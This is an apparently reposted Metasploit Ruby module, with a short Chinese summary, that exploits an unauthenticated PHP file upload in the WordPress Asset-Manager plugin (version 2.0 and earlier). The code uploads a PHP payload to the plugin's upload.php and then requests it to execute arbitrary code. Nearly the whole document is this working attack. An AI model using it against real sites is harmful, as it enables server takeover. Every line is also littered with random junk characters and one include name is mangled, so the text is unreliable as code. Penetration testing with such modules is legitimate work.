这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。8 ^4 G) {+ m O
5 t( `1 A( C( T, U- i##
: x9 }; O6 ^+ q2 Q' p9 L: |# This file is part of the Metasploit Framework and may be subject to
0 n0 y2 T; N" X6 Y% m, P$ f7 ~# redistribution and commercial restrictions. Please see the Metasploit
- G& @* w$ r! q5 G# Framework web site for more information on licensing and terms of use.: B1 {' e) n" z
# http://metasploit.com/framework/
1 \( Z1 u0 o) V/ U; F##; l: l; C3 S) I4 J0 ^7 X
+ D0 d* Q, R0 O& Vrequire 'msf/core'. t3 @" @! p* p3 v1 F
require 'msf/core/exploit/php_exe'
! M3 e# X# {- l; V* R6 Z : m+ w# B4 O# y! H+ @( e$ o5 I
class Metasploit3 < Msf::Exploit::Remote0 |9 ?4 g2 D# Q% I9 t
Rank = ExcellentRanking# C5 L. O; x+ e# d: T
/ I6 X( a) w A* `
include Msf::Exploit::Remote::HttpClient% x P4 }, v# r' ^* n* p
include Msf::Exploit: hpEXE
; a) c% P0 Y7 B4 c/ w K# y' _6 F 6 y3 [" b- m& \
def initialize(info = {})( e: X% p* S( A G; w6 L
super(update_info(info,
: S, x3 J% R* l( o0 V! w 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',& d9 D# ?8 h( H D: c# A
'Description' => %q{* l0 S h" O1 q' _& E% r
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress; K- m& V! V) G! _% {# X
plugin. By abusing the upload.php file, a malicious user can upload a file to a4 N1 M/ @- Y. h& h
temp directory without authentication, which results in arbitrary code execution.: f& S. P' z0 W" _' G' U
},' `+ r) h- j3 g
'Author' =>1 y7 E! T% P7 D- S( Q
[
! X0 p7 f0 R" i( }' [# j% n. S8 Y" ? 'Sammy FORGIT', # initial discovery
4 H8 T2 O, h a/ S6 U. c7 b! Z$ y 'James Fitts <fitts.james[at]gmail.com>' # metasploit module* |" _1 _; l b+ l1 H
],
5 A! C0 k6 z& N# o3 M+ f 'License' => MSF_LICENSE,
% @7 f2 z6 ]5 J/ H* N 'References' =>4 F) G# J3 H; A r$ `2 i3 w4 i
[9 Y1 e! y' ~2 Y' m) ^/ o
[ 'OSVDB', '82653' ],
6 l% E6 v7 c7 z1 S6 B! a6 x8 m0 J [ 'BID', '53809' ],
) d5 u2 h2 @( v4 U D: l5 B: I( V [ 'EDB', '18993' ],
( R5 z, u6 _9 } [ 'URL', 'http:// www.myhack58.com /' ] f; n. _) z- v z) K4 Y6 _7 |
],
1 Z1 c' L3 _$ |' }* m! a. G 'Payload' => l- k. j3 v: Y# q0 e" J: L
{
, c9 r! W7 G8 g0 U& b r& a9 ^ 'BadChars' => "\x00",
3 v' H( L0 Q' r8 z },: B+ |8 w" s: N; H; O1 G5 G7 a
'Platform' => 'php',' G4 ], n0 ~* q0 |5 D/ p( b' U/ K
'Arch' => ARCH_PHP,' ~) w7 l! k. E6 l b0 e- l) c
'Targets' =>$ g2 K I& J( R5 P `! u6 S
[9 K& K) s D$ ^( W( i) z
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],. c0 @+ C4 Z6 d% ~' E0 ?0 {
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]! ~3 o- `. c1 _7 e2 F( u
],3 |" p( k4 f4 ^. h- r; n1 O7 U
'DefaultTarget' => 0,! V4 h0 V; Y; K/ z& P* t+ S
'DisclosureDate' => 'May 26 2012'))
& a! ~, r2 _7 @
2 a3 g4 y# P* J1 ^) M register_options(
0 D( S/ P4 P& W# g* |$ o [
# s, r0 p3 d' T OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
. d! r" S- |/ g/ o ], self.class) P1 A0 M1 a U8 C2 n5 w6 y# P4 Z; r
end* W4 L3 j* ?4 P7 ?+ w% ~2 v0 W
4 q9 y9 S$ F! N4 r# q) N7 L' _
def exploit
7 q. t6 F* |& J0 G( \/ Y$ h6 Z uri = target_uri.path1 b7 o v5 i- ]- ^, u- R
uri << '/' if uri[-1,1] != '/'8 r2 }, C! B" n V4 G6 i
peer = "#{rhost}:#{rport}"
; b6 b( ^- }3 c7 \ payload_name = "#{rand_text_alpha(5)}.php"
4 W9 D, R0 R- [ php_payload = get_write_exec_payload(:unlink_self=>true)
) y5 o5 P$ r# Q F4 V. P
3 u" f( x2 I( N1 Q! `' R data = Rex::MIME::Message.new# P# t9 y4 V3 B- X/ U9 }" s; A& r% X
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\""), y; v# e$ |+ E8 q* J
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')4 y+ M+ |. t3 y' ?
( @4 l3 \1 ^; ^9 k O7 E
print_status("#{peer} - Uploading payload #{payload_name}")
* g" a" A2 ?5 Z/ s; N- Q res = send_request_cgi({
# x! z; A" V: l: D4 Y1 M. n7 A 'method' => 'POST'," K% y% p1 b: A' a/ q" i' _3 T. W
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
8 c$ L( P" t$ S. i 'ctype' => "multipart/form-data; boundary=#{data.bound}",/ H+ b3 I/ t2 \5 x7 J
'data' => post_data# \& g+ p& J( i' m
})/ b6 b( ]7 k( m
" A" |: W& u- Y" \& }3 \6 S if not res or res.code != 200 or res.body !~ /#{payload_name}/
' f: m9 L/ \ L9 ]+ V8 H fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
8 A8 ~5 N4 g. f, P, c/ T2 v0 q) Rend
: k% a! v5 D4 K# ` 6 w3 t7 ]3 B/ r+ C7 D: E4 B% U
print_status("#{peer} - Executing payload #{payload_name}")" C" o/ V* G d7 M$ M0 l
res = send_request_raw({! Y! S# b6 \+ k0 h
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
0 v' v6 D& H( m `4 c2 r/ | 'method' => 'GET'
4 J7 }. P0 s2 k })# K9 o4 y( s! w) n9 Y5 _
+ }. q: C4 k! |1 b m& \ if res and res.code != 200 R3 n1 L2 ^+ D2 F7 q0 J+ n
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
' ?1 _& h7 i5 v' c* V end
8 ]/ Y7 y+ G8 i; H5 M6 P7 Y end
8 S+ Z8 d ^4 P9 u4 z, @end
. N6 s8 J4 p$ h |